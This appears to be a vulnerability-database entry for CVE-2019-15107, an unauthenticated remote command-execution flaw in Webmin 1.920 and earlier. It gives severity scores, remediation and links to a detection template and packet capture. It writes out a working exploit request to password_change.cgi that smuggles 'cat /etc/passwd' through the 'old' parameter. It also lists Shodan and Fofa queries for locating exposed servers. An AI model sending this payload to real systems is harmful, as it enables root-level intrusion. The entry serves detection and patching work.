🔙 목록으로 돌아가기

CVE-2019-15107: Webmin <= 1.920 - Unauthenticated Remote Command Execution

TitleWebmin <= 1.920 - Unauthenticated Remote Command Execution
Authorbp0lr
SeverityCritical
ImpactSuccessful exploitation of this vulnerability allows remote attackers to execute arbitrary commands with root privileges.
RemediationUpgrade to Webmin version 1.930 or later to mitigate this vulnerability.
CVSS Score9.8
EPSS Score0.94461
CVE IDCVE-2019-15107
CWE IDCWE-78
Shodan Queryhttp.title:"webmin"
Fofa Querytitle="webmin"
Tags cve cve2019 packetstorm webmin rce kev edb vkev vuln

🔍 Vulnerability Description

Webmin <=1.920. is vulnerable to an unauthenticated remote command execution via the parameter ‘old’ in password_change.cgi.

🌐 HTTP Request

POST /password_change.cgi HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Version/15.2 Safari/537.36
Connection: close
Content-Length: 73
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Referer: http://www.victim.com
Accept-Encoding: gzip

user=rootxx&pam=&old=test|cat /etc/passwd&new1=test2&new2=test2&expired=2

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-15107.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-15107.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A